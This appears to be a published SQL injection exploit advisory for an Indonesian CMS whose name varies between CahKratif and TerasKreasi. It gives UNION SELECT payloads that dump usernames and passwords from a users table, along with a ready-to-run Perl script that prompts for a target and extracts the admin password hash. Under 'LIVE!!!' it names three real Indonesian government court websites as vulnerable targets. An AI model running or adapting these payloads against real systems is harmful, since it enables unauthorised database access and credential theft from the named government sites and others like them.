########################### # CahKratif CMS Remote SQL Injection Exploit Vulnerability ########################### ========================================================= [+] Title :- TerasKreasi CMS Remote SQL Injection Exploit Vulnerability [+] Vendor Homepage :- http://teraskreasi.com/ [+] Version :- All Versions [+] Tested on :- Linux - Windows - Mac [+] Category :- webapps [+] Exploit Author :- K33P-S1L3NT [+] Team name :- Ternate Lab Pentesting [+] Official Page :- www.facebook.com/loading.gov/ [+] Available :- sql injection cheat sheet | sql injection Remote Script perl [+] Greedz to :- Indonesian People | Sarang-Paniki | Sarang-Bifi | Kamar-Muka [+] Contact :- aurorakoizora@gmail.com ========================================================= [+] Severity Level :- Medium [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- id, hal-visi-dan-misi-pengadilan-agama-blabla.html (string) [+] Affected Area(s) :- Entire admin, database, Server [+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error [+] SQL vulnerable File :- /home/user/public_html/XXX.php [+] POC :- http://127.0.0.1/hal-visi-dan-misi-pengadilan-agama-blabla' and false UNION SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password),9,10,11,12,13,14,15,16,17,18,19+from+users+--+.html The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction. ################################################################## NOTE!!! [+] Edit the script perl for table vuln on username and password DEMO!!! [+] www.site.com/vuln-bugs' and false UNION SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password),9,10,11,12,13,14,15,16,17,18,19+from+users+--+.html ( edit number column for open table group_concat(username,0x3a,password) ) [ like number 7 or 8 or 9 or 10 or 11 or 12 0r 13 ] [+] www.site.com/vuln-bugs' and false UNION SELECT 1,2,3,4,5,6,7,8,group_concat(username,0x3a,password),10,11,12,13,14,15,16,17,18,19+from+users+--+.html [+] www.site.com/vuln-bugs' and false UNION SELECT 1,2,3,4,5,6,7,8,9,like number,11,12,13,14,15,16,17,18,19+from+users+--+.html ################################################################### Remote Exploit Perl script --------------------------- #!/usr/bin/perl -w ######################################## #[~] Author : K33P-S1L3NT #[!] Exploit Name: Ternate Exploit ######################################## print "\n\n"; print "############################################## # [~] Author : K33P-S1L3NT # # [!] Exploit Name: Ternate Exploit # # [+] Publish : www.facebook.com/loading.gov # ############################################## \n\n"; print "+-+ Remote SQL Injection Exploit +-+ \n\n"; use LWP::UserAgent; print " Target site:[http://wwww.site.com/path/]: "; chomp(my $target=<STDIN>); $Ternate="group_concat(username,0x3a,password)"; $Labs="users"; $Pentesting="'+and+false"; $Exploit="+UNION+SELECT+"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target . "/hal-visi-misi-pengadilan-agama-morotai".$Pentesting."+".$Exploit."1,2,3,4,5,6,7,".$Ternate.",9,10,11,12,13,14,15,16,17,18,19+from+".$Labs."+--+.html"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){ print "\n[+] Admin Account : $1\n\n"; print "# Exploit Done #\n\n"; } else {print "\n[-] NOT FOUND."; } ---------------------------------------------------------------------------------------------------- NOTE SCRIPT!! [+] Edit the script => $host = $target . "/hal-visi-misi-pengadilan-agama-blabla" or $host = $target . "/blabla-bugs-vuln" LIVE!!! http://pa-morotai.go.id/ => http://i.imgur.com/2fqM3WR.png http://pa-ternate.go.id/ => http://i.imgur.com/EmklNdn.png http://pn-tobelo.go.id/ => http://i.imgur.com/2GnnxJ5.png ################################### # # # Discovered Analyze by : Ternate-Labs Pentesting # # # ###################################